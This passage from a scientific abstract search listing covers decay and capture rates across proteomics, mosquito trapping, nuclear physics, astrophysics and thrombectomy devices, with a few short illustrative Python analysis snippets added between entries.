and drug-treated cells. The results show that Hsp90 inhibition induced a generalized slowdown of protein synthesis and an increase in protein decay. Treatment with the inhibitor also resulted in widespread protein-specific changes in relative synthesis rates, together with variations in protein decay rates. The latter were more restricted to individual proteins or protein families than the variations in synthesis. Our results establish pcSILAC as a viable workflow for the mechanistic dissection of changes in the proteome which follow perturbations. Data are available via ProteomeXchange with identifier PXD000538. PMID:24312217 2. Relationship between mosquito (Diptera: Culicidae) landing rates on a human subject and numbers captured using CO2-baited light traps. PubMed Barnard, D R; Knue, G J; Dickerson, C Z; Bernier, U R; Kline, D L 2011-06-01 Capture rates of insectary-reared female Aedes albopictus (Skuse), Anopheles quadrimaculatus Say, Culex nigripalpus Theobald, Culex quinquefasciatus Say and Aedes triseriatus (Say) in CDC-type light traps (LT) supplemented with CO2 and using the human landing (HL) collection method were observed in matched-pair experiments in outdoor screened enclosures. Mosquito responses were compared on a catch-per-unit-effort basis using regression analysis with LT and HL as the dependent and independent variables, respectively. The average number of mosquitoes captured in 1 min by LT over a 24-h period was significantly related to the average number captured in 1 min by HL only for Cx. nigripalpus and Cx. quinquefasciatus. Patterns of diel activity indicated by a comparison of the mean response to LT and HL at eight different times in a 24-h period were not superposable for any species. The capture rate efficiency of LT when compared with HL was ≤15% for all mosquitoes except Cx. quinquefasciatus (43%). 
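The regression described above, with light-trap catch per unit effort as the dependent variable and human-landing catch as the independent variable, can be sketched as follows; the catch-per-minute arrays are hypothetical values, not the published data.

import numpy as np
from scipy import stats

# Hypothetical catch-per-minute data for one species across paired trials
hl = np.array([1.2, 0.8, 2.5, 3.1, 0.5, 1.9, 2.2, 0.9])          # human landing
lt = np.array([0.15, 0.10, 0.33, 0.41, 0.04, 0.27, 0.30, 0.12])  # CO2-baited light trap

# Ordinary least-squares regression of LT on HL, as in the matched-pair design
result = stats.linregress(hl, lt)
print(f"slope = {result.slope:.3f}, r = {result.rvalue:.3f}, p = {result.pvalue:.4f}")
# A slope near 0.13 in this toy example would correspond roughly to a 13% LT-vs-HL capture efficiency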
Statistical models of the relationship between mosquito responses to each collection method indicate that, except for Ae. albopictus, LT and HL capture rates are significantly related only during certain times of the diel period. Estimates of mosquito activity based on observations made between sunset and sunrise were most precise in this regard for An. quadrimaculatus and Cx. nigripalpus, as were those between sunrise and sunset for Cx. quinquefasciatus and Ae. triseriatus. 3. Effect of Fungal Competition on Decay Rates in Bicultured Soil Bottle Assays Treesearch Grant T. Kirker; Amy Blodgett; Patricia K. Lebow; Carol A. Clausen 2016-01-01 For decades, wood scientists and preservative formulators have employed the monocultured soil bottle assay to test efficacy of wood treatment in the laboratory as a rapid predictor of field performance. This study examines the effects of bicultured soil bottle assays on the decay by common wood decay fungi. Mycelial interactions were noted in early stages of... 4. Relaxation of the CH stretch in liquid CHBr3: Solvent effects and decay rates using classical nonequilibrium simulations Ramesh, Sai G.; Sibert, Edwin L. 2006-12-01 This article addresses two questions regarding the decay of the CH stretch in liquid CHBr3. The first is whether the initial steps of the relaxation primarily involve energy redistribution within the excited molecule alone. Gas phase quantum mechanical and classical calculations are performed to examine the role of the solvent in this process. At the fundamental excitation level, it is found that CH stretch decay is, in fact, strongly solvent driven. The second question is on the applicability of a fully classical approach to the calculation of CH stretch condensed phase decay rates. To this end, nonequilibrium molecular dynamics simulations are performed. The results are compared with quantum mechanical rates computed previously. The two methods are found to be in fair agreement with each other. However, care must be exercised in the interpretation of the classical results. 5. A Correlation Between Intrinsic Brightness and Average Decay Rate of Swift UVOT GRB Optical/UV Light Curves NASA Technical Reports Server (NTRS) Oates, S. R.; Page, M. J.; De Pasquale, M.; Schady, P.; Breeveld, A. A.; Holland, S. T.; Kuin, N. P. M.; Marshall, F. E. 2012-01-01 We examine a sample of 48 Swift/UVOT long Gamma-ray Burst light curves and find a correlation between the logarithmic luminosity at 200s and average decay rate determined from 200s onwards, with a Spearman rank coefficient of -0.58 at a significance of 99.998% (4.2 sigma ). We discuss the causes of the log L200s - alpha (greater than) 200s correlation, finding it to be an intrinsic property of long GRBs, and not resulting from the selection criteria. We find two ways to produce the correlation. One possibility is that there is some property of the central engine, outflow or external medium that affects the rate of energy release so that the bright afterglows release their energy more quickly and decay faster than the fainter afterglows. Alternatively, the correlation may be produced by variation of the observers viewing angle, with observers at large viewing angles observing fainter and slower decaying light curves. 6. Experimental investigation of effect of jet decay rate on jet-induced pressures on a flat plate NASA Technical Reports Server (NTRS) Kuhlman, J. M.; Ousterhout, D. S.; Warcup, R. W. 
1978-01-01 An experimental study of the interaction between a lift jet and an aircraft wing for a jet VTOL aircraft was performed for the simplified model of an unheated, subsonic, circular jet exiting at right angles to a flat plate into a uniform subsonic crosswind. The effects of jet dynamic pressure decay rate upon the jet location and jet induced pressure distribution on the plate were studied over a range of jet to crossflow velocity ratios of 2.2 or = R or = 10. Jet decay rate was varied through use of cylindrical centerbodies with flat or hemispherical tips submerged in the jet nozzle at various depths below the jet exit plane. Quicker jet dynamic pressure decay, caused by the presence of a centerbody, resulted in reductions in the jet induced lift loss by as much as 45 percent relative to values for jets with no centerbody. These reductions in lift loss were observed at the larger values of crossflow velocity. 7. A halo-independent lower bound on the dark matter capture rate in the Sun from a direct detection signal SciTech Connect Blennow, Mattias; Herrero-Garcia, Juan; Schwetz, Thomas 2015-05-21 We show that a positive signal in a dark matter (DM) direct detection experiment can be used to place a lower bound on the DM capture rate in the Sun, independent of the DM halo. For a given particle physics model and DM mass we obtain a lower bound on the capture rate independent of the local DM density, velocity distribution, galactic escape velocity, as well as the scattering cross section. We illustrate this lower bound on the capture rate by assuming that upcoming direct detection experiments will soon obtain a significant signal. When comparing the lower bound on the capture rate with limits on the high-energy neutrino flux from the Sun from neutrino telescopes, we can place upper limits on the branching fraction of DM annihilation channels leading to neutrinos. With current data from IceCube and Super-Kamiokande non-trivial limits can be obtained for spin-dependent interactions and direct annihilations into neutrinos. In some cases also annihilations into ττ or bb start getting constrained. For spin-independent interactions current constraints are weak, but they may become interesting for data from future neutrino telescopes. 8. Relationship between mosquito (Diptera: Culicidae) landing rates on a human subject and numbers captured using CO2-baited light traps USDA-ARS?s Scientific Manuscript database Capture rates of female Aedes albopictus Skuse, Aedes triseriatus (Say), Anopheles quadrimaculatus Say, Culex nigripalpus Theobald, and Culex quinquefasciatus Say in CDC-type light traps supplemented with CO2 (LT) and using the human landing (HL) collection method were observed in matched-pair exper... 9. Approaches for the Direct estimation of rate of increase in population size (λ) using capture-recapture data Treesearch James D. Nichols; Scott T. Sillett; James E. Hines; Richard T. Holmes 2005-01-01 Recent developments in the modeling of capture-recapture data permit the direct estimation and modeling of population growth rate Pradel (1996). Resulting estimates reflect changes in numbers of birds on study areas, and such changes result from movement as well as survival and reproductive recruitment. One measure of the “importance” of a... 10. Using the Inflection Points and Rates of Growth and Decay to Predict Levels of Solar Activity NASA Technical Reports Server (NTRS) Wilson, Robert M.; Hathaway, David H. 
2008-01-01 The ascending and descending inflection points and rates of growth and decay at specific times during the sunspot cycle are examined as predictors for future activity. On average, the ascending inflection point occurs about 1-2 yr after sunspot minimum amplitude (Rm) and the descending inflection point occurs about 6-7 yr after Rm. The ascending inflection point and the inferred slope (the 12-mo moving average (12-mma) of ΔR, the month-to-month change in the smoothed monthly mean sunspot number R, evaluated at the ascending inflection point) provide strong indications as to the expected size of the ongoing cycle's sunspot maximum amplitude (RM), while the descending inflection point appears to provide an indication as to the expected length of the ongoing cycle. The value of the 12-mma of ΔR at elapsed time T = 27 mo past the epoch of RM (E(RM)) seems to provide a strong indication as to the expected size of Rm for the following cycle. The expected Rm for cycle 24 is 7.6 +/- 4.4 (the 90-percent prediction interval), occurring before September 2008. Evidence is also presented for secular rises in selected cycle-related parameters and for preferential grouping of sunspot cycles by amplitude and/or period. 11. Precision measurement of the decay rate of the negative positronium ion Ps⁻ SciTech Connect Ceeh, Hubert; Hugenschmidt, Christoph; Schreckenbach, Klaus; Gaertner, Stefan A.; Thirolf, Peter G.; Fleischer, Frank; Schwalm, Dirk 2011-12-15 The negative positronium ion Ps⁻ is a bound system consisting of two electrons and a positron. Its three constituents are pointlike leptonic particles of equal mass, which are subject only to the electroweak and gravitational forces. Hence, Ps⁻ is an ideal object in which to study the quantum mechanics of a three-body system. The ground state of Ps⁻ is stable against dissociation but unstable against annihilation into photons. We report here on a precise measurement of the Ps⁻ ground-state decay rate Γ, which was carried out at the high-intensity NEutron induced POsitron source MUniCh (NEPOMUC) at the research reactor FRM II in Garching. A value of Γ = 2.0875(50) ns⁻¹ was obtained, which is three times more precise than previous experiments and in agreement with the most recent theoretical predictions. The achieved experimental precision is at the level of the leading corrections in the theoretical predictions. 12. Probing Anderson localization of light via decay rate statistics in aperiodic Vogel spirals Christofi, Aristi; Pinheiro, Felipe A.; Dal Negro, Luca We systematically investigate the spectral properties of different types of two-dimensional aperiodic Vogel spiral arrays of pointlike scatterers and of three-dimensional metamaterials with Vogel spiral chirality using a rigorous Green's function spectral method. We consider an efficient T-matrix approach to analyze multiple-scattering effects, including all scattering orders, and to understand localization properties through the statistics of the Green's matrix eigenvalues. The knowledge of the spectrum of the Green matrix of multi-particle scattering systems provides important information on the character of light propagation and localization in chiral media with deterministic aperiodic geometry. 
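The entry above (and its continuation below) extracts collective decay rates and the inverse participation ratio (IPR) from the eigenvalues and eigenvectors of the Green's matrix. The snippet below is a generic textbook sketch of that construction for scalar waves and randomly placed point scatterers (not a Vogel spiral, and not the authors' T-matrix code); conventions and prefactors vary between papers, so the output should be read qualitatively.

```python
# Sketch: decay-rate and IPR statistics from the scalar Green's matrix of
# N point scatterers at random positions. Conventions/prefactors vary; the
# positions, N, k, and box size below are arbitrary illustrative choices.
import numpy as np

rng = np.random.default_rng(0)
N, k, L = 500, 2 * np.pi, 10.0            # scatterers, wavenumber, box size
r = rng.uniform(0, L, size=(N, 3))         # random positions (not a Vogel spiral)

# Pairwise distances and the Green matrix: i on the diagonal,
# exp(i k r_jk) / (k r_jk) off the diagonal (one common convention).
d = np.linalg.norm(r[:, None, :] - r[None, :, :], axis=-1)
np.fill_diagonal(d, 1.0)                   # avoid division by zero on the diagonal
G = np.exp(1j * k * d) / (k * d)
np.fill_diagonal(G, 1j)

vals, vecs = np.linalg.eig(G)
decay = vals.imag                          # proportional to the modal decay rates
w = np.abs(vecs) ** 2
ipr = (w ** 2).sum(axis=0) / w.sum(axis=0) ** 2   # inverse participation ratio per mode

print("smallest relative decay rates:", np.sort(decay)[:5])
print("median IPR:", np.median(ipr))
```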
In particular, we analyze for the first time the statistics of the eigenvalues and eigenvectors of the Green matrix and extract the decay rates of the eigenmodes, their inverse participation ratio (IPR), the Wigner delay times and their quality factors. We emphasize the unique properties of aperiodic Vogel spirals with respect to random scattering media, which have been investigated so far. This work was supported by the Army Research Laboratory under Cooperative Agreement Number W911NF-12-2-0023. 13. Decay rates of a molecule in the vicinity of a spherical surface of an isotropic magnetodielectric material Chung, H. Y.; Leung, P. T.; Tsai, D. P. 2012-10-01 A comprehensive study is presented on the decay rates of excited molecules in the vicinity of a magnetodielectric material of spherical geometry via electrodynamic modeling. Both the models based on a driven-damped harmonic oscillator and on energy transfers will be applied so that the total decay rates can be rigorously decomposed into the radiative and the nonradiative rates. Clarifications of the equivalence of these two models for arbitrary geometry will be provided. Different possible orientations and locations of the molecule are studied with the molecule being placed near a spherical particle or a cavity. Among other results, TE modes are observed which can be manifested via nonradiative transfer from a tangential dipole within a small range of dissipation parameters set for the spherical particle. In addition, spectral analysis shows that decay rates at such a particle with small absorption are largely dominated by radiative transfer except at multipolar resonances when nonradiative transfer becomes prominent, and relatively unmodified decay is possible when negative refraction takes place. 14. Determination of plate wave velocities and diffuse field decay rates with braod-band acousto-ultrasonic signals NASA Technical Reports Server (NTRS) Kautz, Harold E. 1993-01-01 Lowest symmetric and lowest antisymmetric plate wave modes were excited and identified in broad-band acousto-ultrasonic (AU) signals collected from various high temperature composite materials. Group velocities have been determined for these nearly nondispersive modes. An algorithm has been developed and applied to determine phase velocities and hence dispersion curves for the frequency ranges of the broad-band pulses. It is demonstrated that these data are sensitive to changes in the various stiffness moduli of the materials, in agreement by analogy, with the theoretical and experimental results of Tang and Henneke on fiber reinforced polymers. Diffuse field decay rates have been determined in the same specimen geometries and AU configuration as for the plate wave measurements. These decay rates are of value in assessing degradation such as matrix cracking in ceramic matrix composites. In addition, we verify that diffuse field decay rates respond to fiber/matrix interfacial shear strength and density in ceramic matrix composites. This work shows that velocity/stiffness and decay rate measurements can be obtained in the same set of AU experiments for characterizing materials and in specimens with geometries useful for mechanical measurements. 15. Neutron capture by Ru: Neutron cross sections of {sup 96,102,104}Ru and gamma-ray spectroscopy in the decays of {sup 97,103,105}Ru SciTech Connect Krane, K. S. 2010-04-15 Cross sections for radiative capture of neutrons have been measured for stable isotopes of Ru with mass numbers 96,102, and 104. 
From separate irradiations using thermal and epithermal neutrons, independent values for the thermal cross section and the effective resonance integral have been determined. Spectroscopic studies of the gamma rays emitted in the decays of 97,103,105Ru have enabled improvements in the precision of the energies and intensities of the radiations, along with corresponding improvements in the beta-decay feeding intensities and the energies of the levels in the respective daughter nuclei. Similar spectroscopic measurements of the decays of 105Rh (daughter of 105Ru) and 96Tc (produced from n,p reactions on 96Ru) have resulted in improved gamma-ray energies and intensities in those decays. 16. Searches for massive neutrino emission in 14C beta and 55Fe electron-capture decays SciTech Connect Wietfeldt, Fred Eberhardt 1994-05-01 In 1985, Simpson reported evidence for the emission of a 17 keV mass neutrino in a small fraction of tritium beta decays. An experimental controversy ensued in which a number of both positive and negative results were reported. The beta spectrum of 14C was collected in a unique 14C-doped planar germanium detector, and a distortion was observed that initially confirmed Simpson's result. Further tests linked this distortion to a splitting of the collected charge between the central detector and the surrounding guard ring in a fraction of the events. A second 14C measurement showed no evidence for emission of a 17 keV mass neutrino. In a related experiment, a high-statistics electron-capture internal-bremsstrahlung photon spectrum of 55Fe was collected with a coaxial germanium detector. A local search for departures from a smooth shape near the endpoint was performed, using a second-derivative technique. An upper limit of 0.65% (95% C.L.) for the mixing of a neutrino in the mass range 5–25 keV was established. The upper limit on the mixing of a 17 keV mass neutrino was 0.14% (95% C.L.). 17. Exact evaluation of the rates of electrostatic decay and scattering off thermal ions for an unmagnetized Maxwellian plasma SciTech Connect Layden, B.; Cairns, Iver H.; Robinson, P. A. 2013-08-15 Electrostatic decay of Langmuir waves into Langmuir and ion sound waves (L→L′+S) and scattering of Langmuir waves off thermal ions (L+i→L′+i′, also called “nonlinear Landau damping”) are important nonlinear weak-turbulence processes. The rates for these processes depend on the quadratic longitudinal response function α^(2) (or, equivalently, the quadratic longitudinal susceptibility χ^(2)), which describes the second-order response of a plasma to electrostatic wave fields. Previous calculations of these rates for an unmagnetized Maxwellian plasma have relied upon an approximate form for α^(2) that is valid where two of the wave fields are fast (i.e., v_φ = ω/k ≫ V_e, where ω is the angular frequency, k is the wavenumber, and V_e is the electron thermal speed) and one is slow (v_φ ≪ V_e). Recently, an exact expression was derived for α^(2) that is valid for any phase speeds of the three waves in an unmagnetized Maxwellian plasma. Here, this exact α^(2) is applied to the calculation of the three-dimensional rates for electrostatic decay and scattering off thermal ions, and the resulting exact rates are compared with the approximate rates. 
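The 55Fe entry above searches for a kink near the spectrum endpoint with a second-derivative technique. The snippet below is a minimal sketch of that idea on a synthetic spectrum with an injected kink; the spectral shape, kink position, and amplitude are invented for illustration, and a real analysis would additionally model detector response, statistical noise, and limit setting.

```python
# Sketch of a second-derivative endpoint ("kink") search on a synthetic spectrum.
# The smooth shape and the injected branch are purely illustrative.
import numpy as np

E = np.linspace(200.0, 231.0, 400)                         # energy bins (keV), arbitrary
smooth = (231.0 - E) ** 2                                  # smooth endpoint-like shape
kink = np.where(E < 214.0, 0.02 * (214.0 - E) ** 2, 0.0)   # small extra branch below 214 keV
spectrum = smooth + kink

d1 = np.gradient(spectrum, E)
d2 = np.gradient(d1, E)                                    # numerical second derivative
jump = np.abs(np.diff(d2))                                 # a kink shows up as a step in d2
core = jump[5:-5]                                          # drop edge bins (one-sided differences)
i = int(np.argmax(core)) + 5
print(f"second-derivative feature near E = {E[i]:.1f} keV (kink injected at 214.0 keV)")
```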
The calculations are performed using previously derived three-dimensional rates for electrostatic decay given in terms of a general α{sup (2)}, and newly derived three-dimensional rates for scattering off thermal ions; the scattering rate is derived assuming a Maxwellian ion distribution, and both rates are derived assuming arc distributions for the wave spectra. For most space plasma conditions, the approximate rate is found to be accurate to better than 20%; however, for sufficiently low Langmuir phase speeds (v{sub φ}/V{sub e}≈3) appropriate to some spatial domains of the foreshock regions of planetary bow shocks and type II solar radio bursts, the use of the exact rate may be necessary for accurate calculations. The relative rates of electrostatic decay 18. Approaches for the direct estimation of rate of increase in population size using capture-recapture data USGS Publications Warehouse Nichols, J.D.; Sillett, T. Scott; Hines, J.E.; Holmes, Richard T.; Ralph, C. John; Rich, Terrell D. 2005-01-01 Recent developments in the modeling of capture-recapture data permit the direct estimation and modeling of population growth rate Pradel (1996). Resulting estimates reflect changes in numbers of birds on study areas, and such changes result from movement as well as survival and reproductive recruitment. One measure of the 'importance' of a demographic vital rate to population growth is based on temporal covariation (i.e., do changes in population growth follow changes in vital rates). If data are available to estimate vital rates or their components, then such data can be combined with capture-recapture data in order to estimate parameters of the relationship between population growth and the vital rate. These methods are illustrated using capture-recapture and nest observation data for Black-throated Blue Warblers, Dendroica caerulescens, from a long-term study at Hubbard Brook Experimental Forest, New Hampshire, USA. Population growth rate was found to be positively associated with the proportion of birds that double-brood. We encourage use of these methods and believe they will prove to be very useful in research on, and management of, migratory bird populations. 19. Exact estimate of the α -decay rate and semiclassical approach in deformed nuclei Delion, D. S.; Liotta, R. J.; Wyss, R. 2015-11-01 We compare the quantum mechanical procedures to estimate the total α -decay width from deformed nuclei in the laboratory and intrinsic systems of coordinates. Our analysis shows that the total half-life estimated in the intrinsic frame by neglecting the rotational motion of the core (adiabatic approach) is one order of magnitude smaller at β2=0.3 than the corresponding value in the spherical case. A similar calculation in the laboratory system of coordinates by considering the core motion (giving the correct theoretical estimate) predicts a reduction by only a factor of 2. The widely used "angular WKB" (Wentzel-Kramers-Brillouin) semiclassical procedure provides decay widths which are comparable to the adiabatic approach. We propose a new and very simple semiclassical "angular momentum WKB" procedure to evaluate the decay width in deformed nuclei. It provides decay widths very close to the ones obtained by the exact laboratory coupling channels procedure. 20. 
Astrophysical reaction rates for Ni-58,Ni-60(n,gamma) from new neutron capture cross section measurements SciTech Connect Guber, Klaus H; Derrien, Herve; Leal, Luiz C; Arbanas, Goran; Wiarda, Dorothea; Koehler, Paul; Harvey, John A 2010-01-01 New neutron capture cross section of 58,60Ni were measured in the energy range from 100 eV to 600 keV using the Oak Ridge Electron Linear Accelerator (ORELA). The combination of these new neutron capture data with previous transmission data allowed a resonance analysis up to 900 keV using R-matrix theory. The theoretically determined direct capture (DC) cross sections were included in the analyses. From these resonance parameters and the DC contribution, new (n,y) astrophysical reaction rates were determined over the entire energy range needed by the lastest stellar models describing the so-called weak s process. PACS numbers: 25.40.Lw, 26.20Kn, 27.40.+z, 27.50.+e, 97.10.Cv 1. Decay rates of Gaussian-type I-balls and Bose-enhancement effects in 3+1 dimensions SciTech Connect 2014-02-03 I-balls/oscillons are long-lived spatially localized lumps of a scalar field which may be formed after inflation. In the scalar field theory with monomial potential nearly and shallower than quadratic, which is motivated by chaotic inflationary models and supersymmetric theories, the scalar field configuration of I-balls is approximately Gaussian. If the I-ball interacts with another scalar field, the I-ball eventually decays into radiation. Recently, it was pointed out that the decay rate of I-balls increases exponentially by the effects of Bose enhancement under some conditions and a non-perturbative method to compute the exponential growth rate has been derived. In this paper, we apply the method to the Gaussian-type I-ball in 3+1 dimensions assuming spherical symmetry, and calculate the partial decay rates into partial waves, labelled by the angular momentum of daughter particles. We reveal the conditions that the I-ball decays exponentially, which are found to depend on the mass and angular momentum of daughter particles and also be affected by the quantum uncertainty in the momentum of daughter particles. 2. Factors Influencing Male Plutella xylostella (Lepidoptera: Plutellidae) Capture Rates in Sex Pheromone-Baited Traps on Canola in Western Canada. PubMed Miluch, C E; Dosdall, L M; Evenden, M L 2014-12-01 Optimization of male moth trapping rates in sex pheromone-baited traps plays a key role in managing Plutella xylostella (L.). We investigated various ways to increase the attractiveness of pheromone-baited traps to P. xylostella in canola agroecosystems in AB, Canada. Factors tested included pheromone blend and dose, addition of a green leaf volatile to the pheromone at different times during the season, lure type, trap color, and height. The industry standard dose of 100 μg of pheromone (four-component blend) per lure (ConTech Enterprises Inc., Delta, British Columbia [BC], Canada) captured the most moths in the two lure types tested. Traps baited with pheromone released from gray rubber septa captured more males than those baited with red rubber septa. Traps baited with lures in which Z11-16: Ac is the main component attracted significantly more moths than those in which Z11-16: Ald is the main component. The addition of the green leaf volatile, (Z)-3-hexenyl acetate, to pheromone at a range of doses, did not increase moth capture at any point during the canola growing season. 
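Turning an energy-dependent capture cross section into an astrophysical reaction rate, as in the Ni(n,γ) entry above, usually proceeds through the Maxwellian-averaged cross section, MACS(kT) = (2/√π) ∫ σ(E) E e^(−E/kT) dE / (kT)². The snippet below evaluates that standard integral numerically for a toy 1/v cross section; the σ(E) used here is an illustrative placeholder, not the ORELA data or resonance parameters.

```python
# Maxwellian-averaged capture cross section (MACS) from a toy sigma(E).
# The 1/v cross section below is a placeholder, not measured data.
import numpy as np
from scipy.integrate import quad

def sigma_barns(E_keV):
    return 0.5 / np.sqrt(E_keV)           # toy 1/v capture cross section (barns)

kT = 30.0                                  # keV, the classical s-process thermal energy
integral, _ = quad(lambda E: sigma_barns(E) * E * np.exp(-E / kT), 1e-6, 50 * kT)
macs = (2.0 / np.sqrt(np.pi)) * integral / kT**2

# For a pure 1/v shape the analytic answer is 0.5 / sqrt(kT) barns (about 91 mb at 30 keV).
print(f"MACS(kT = {kT:.0f} keV) ≈ {macs * 1e3:.1f} mb")
```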
Unpainted white traps captured significantly more male moths than pheromone-baited traps that were painted yellow. Trap height had no significant effect on moth capture. Recommendations for monitoring P. xylostella in canola agroecosystems of western Canada include using a pheromone blend with Z11-16: Ac as the main component released from gray rubber septa at a dose of 100 μg. 3. Neutron-capture rates for explosive nucleosynthesis: the case of 68Ni(n, γ)69Ni DOE PAGES Spyrou, Artemis; Larsen, Ann-Cecilie; Liddick, Sean N.; ... 2017-02-22 Neutron-capture reactions play an important role in heavy element nucleosynthesis, since they are the driving force for the two processes that create the vast majority of the heavy elements. When a neutron capture occurs on a short-lived nucleus, it is extremely challenging to study the reaction directly and therefore the use of indirect techniques is essential. The present work reports on such an indirect measurement that provides strong constraints on the 68Ni(n,g)69Ni reaction rate.The commonly used reaction libraries JINA-REACLIB and BRUSLIB are in relatively good agreement with the experimental rate. The impact of the new rate on weak r-process calculationsmore » is discussed.« less 4. A coupled deterministic/stochastic method for computing neutron capture therapy dose rates Hubbard, Thomas Richard Neutron capture therapy (NCT) is an experimental method of treating brain tumors and other cancers by: (1) injecting or infusing the patient with a tumor-seeking, neutron target-labeled drug; and (2) irradiating the patient in an intense epithermal neutron fluence. The nuclear reaction between the neutrons and the target nuclei (e.g. sp{10}B(n,alpha)sp7Lirbrack releases energy in the form of high-LET (i.e. energy deposited within the range of a cell diameter) reaction particles which selectively kill the tumor cell. The efficacy of NCT is partly dependent on the delivery of maximum thermal neutron fluence to the tumor and the minimization of radiation dose to healthy tissue. Since the filtered neutron source (e.g. research reactor) usually provides a broad energy spectrum of highly-penetrating neutron and gamma-photon radiation, detailed transport calculations are necessary in order to plan treatments that use optimal treatment facility configurations and patient positioning. Current computational methods for NCT use either discrete ordinates calculation or, more often, Monte Carlo simulation to predict neutron fluences in the vicinity of the tumor. These methods do not, however, accurately calculate the transport of radiation throughout the entire facility or the deposition of dose in all the various parts of the body due to shortcomings of using either method alone. A computational method, specifically designed for NCT problems, has been adapted from the MASH methodology and couples a forward discrete ordinates (Ssb{n}) calculation with an adjoint Monte Carlo run to predict the dose at any point within the patient. The transport from the source through the filter/collimator is performed with a forward DORT run, and this is then coupled to adjoint MORSE results at a selected coupling parallelepiped which surrounds human phantom. Another routine was written to allow the user to generate the MORSE models at various angles and positions within the treatment room. The 5. Environmental Controls on Cumulative and Yearly Litter Decay Rates Over Four Years in Forested and Harvested Sites Across Canada Trofymow, J. 
A.; Thompson, E.; Cameron, A.; Pare, D.; Amiro, B. D.; Lavigne, M.; Smyth, C.; Black, T. A.; Barr, A. G.; Margolis, H. A. 2010-12-01 weak. Both temperature and moisture accounted for differences in cumulative decay rates and mass loss of surface litter among forest site type and cover, though soil microenvironment accounted for more variation than did site climate. Forest site type and cover effects were still significant even when controlled for microenvironment, suggesting other soil or biotic factors need to be accounted for in predicting litter decay. 6. Large O(m-2c) nonperturbative corrections to the inclusive rate of the decay B -> Xsγ Voloshin, M. B. 1997-02-01 It is shown that the inclusive rate of the rare weak radiative decays B -> Xsγ contains a series of nonperturbative corrections, whose short distance' scale is set by m-1c, rather than bym-1b . The first correction in this series is expressed through the chromomagnetic interaction of the b quark inside the B meson and the relative magnitude of the effect is determined by the ratio /m2c. Though the magnitude of this first correction is suppressed by a numerical coefficient, the sensitivity of the decay rate to the distance scale m-1c may significantly limit the accuracy of purely perturbative predictions for the rate. 7. Large-scale evaluation of β -decay rates of r -process nuclei with the inclusion of first-forbidden transitions Marketin, T.; Huther, L.; Martínez-Pinedo, G. 2016-02-01 Background: r -process nucleosynthesis models rely, by necessity, on nuclear structure models for input. Particularly important are β -decay half-lives of neutron-rich nuclei. At present only a single systematic calculation exists that provides values for all relevant nuclei making it difficult to test the sensitivity of nucleosynthesis models to this input. Additionally, even though there are indications that their contribution may be significant, the impact of first-forbidden transitions on decay rates has not been systematically studied within a consistent model. Purpose: Our goal is to provide a table of β -decay half-lives and β -delayed neutron emission probabilities, including first-forbidden transitions, calculated within a fully self-consistent microscopic theoretical framework. The results are used in an r -process nucleosynthesis calculation to asses the sensitivity of heavy element nucleosynthesis to weak interaction reaction rates. Method: We use a fully self-consistent covariant density functional theory (CDFT) framework. The ground state of all nuclei is calculated with the relativistic Hartree-Bogoliubov (RHB) model, and excited states are obtained within the proton-neutron relativistic quasiparticle random phase approximation (p n -RQRPA). Results: The β -decay half-lives, β -delayed neutron emission probabilities, and the average number of emitted neutrons have been calculated for 5409 nuclei in the neutron-rich region of the nuclear chart. We observe a significant contribution of the first-forbidden transitions to the total decay rate in nuclei far from the valley of stability. The experimental half-lives are in general well reproduced for even-even, odd-A , and odd-odd nuclei, in particular for short-lived nuclei. The resulting data table is included with the article as Supplemental Material. Conclusions: In certain regions of the nuclear chart, first-forbidden transitions constitute a large fraction of the total decay rate and must be 8. 
Calculation of the decay rate of tachyonic neutrinos against charged-lepton-pair and neutrino-pair Cerenkov radiation Jentschura, Ulrich D.; Nándori, István; Ehrlich, Robert 2017-10-01 We consider in detail the calculation of the decay rate of high-energy superluminal neutrinos against (charged) lepton pair Cerenkov radiation and neutrino pair Cerenkov radiation, i.e., against the decay channels ν → ν e⁺e⁻ and ν → ν ν̄ν. Under the hypothesis of a tachyonic nature of neutrinos, these decay channels put constraints on the lifetime of high-energy neutrinos for terrestrial experiments as well as on cosmic scales. For the oncoming neutrino, we use the Lorentz-covariant tachyonic relation E_ν = √(p² − m_ν²), where m_ν is the tachyonic mass parameter. We derive both the threshold conditions and the decay and energy-loss rates, using the plane-wave fundamental bispinor solutions of the tachyonic Dirac equation. Various intricacies of rest-frame versus lab-frame calculations are highlighted. The results are compared to the observations of high-energy IceCube neutrinos of cosmological origin. 9. Modification of magicity toward the dripline and its impact on electron-capture rates for stellar core collapse 2016-02-01 The importance of microphysical inputs from laboratory nuclear experiments and theoretical nuclear structure calculations in the understanding of core-collapse dynamics and the subsequent supernova explosion is largely recognized in the recent literature. In this work, we analyze the impact of the masses of very neutron-rich nuclei on the matter composition during collapse and the corresponding electron-capture rate. To this end, we introduce an empirical modification of the popular Duflo-Zuker mass model to account for possible shell quenching far from stability. We study the effect of this quenching on the average electron-capture rate. We show that the pre-eminence of the closed shells with N = 50 and N = 82 in the collapse dynamics is considerably decreased if the shell gaps are reduced in the region of 78Ni and beyond. As a consequence, local modifications of the overall electron-capture rate of up to 30% can be expected, depending on the strength of magicity quenching. This finding has potentially important consequences for the entropy generation, the neutrino emissivity, and the mass of the core at bounce. Our work underlines the importance of new experimental measurements in this region of the nuclear chart, the most crucial information being the nuclear mass and the Gamow-Teller strength. Reliable microscopic calculations of the associated elementary rate, in a wide range of temperatures and electron densities, optimized on this new empirical information, will additionally be needed to get quantitative predictions of the collapse dynamics. 10. TREVO and Capture LP have equal technical success rates in mechanical thrombectomy of proximal and distal anterior circulation occlusions. PubMed Protto, Sara; Pienimäki, Juha-Pekka; Seppänen, Janne; Matkaselkä, Ira; Ollikainen, Jyrki; Numminen, Heikki; Sillanpää, Niko 2017-07-01 Mechanical thrombectomy (MT) is a proven method to treat large vessel occlusions in acute anterior circulation stroke. We compared the technical, imaging, and clinical outcomes of MT performed with either TREVO or Capture LP devices. There were 42 and 43 patients in the TREVO and Capture LP groups, respectively. 
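The thrombectomy study above compares recanalization (TICI 2b-3) proportions between the two devices before moving to logistic regression, with the actual outcome figures quoted in the continuation below. As a minimal, hedged sketch of that first comparison step, the snippet runs a Fisher exact test on a 2×2 table of made-up counts; the counts are placeholders, not the study's patient data.

```python
# 2x2 comparison of TICI 2b-3 success between two devices.
# Counts are hypothetical placeholders, not data from the study above.
from scipy.stats import fisher_exact

#             success, failure
trevo      = [38, 4]      # 42 patients, illustrative split
capture_lp = [38, 5]      # 43 patients, illustrative split

odds_ratio, p_value = fisher_exact([trevo, capture_lp])
print(f"odds ratio = {odds_ratio:.2f}, p = {p_value:.3f}")
```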
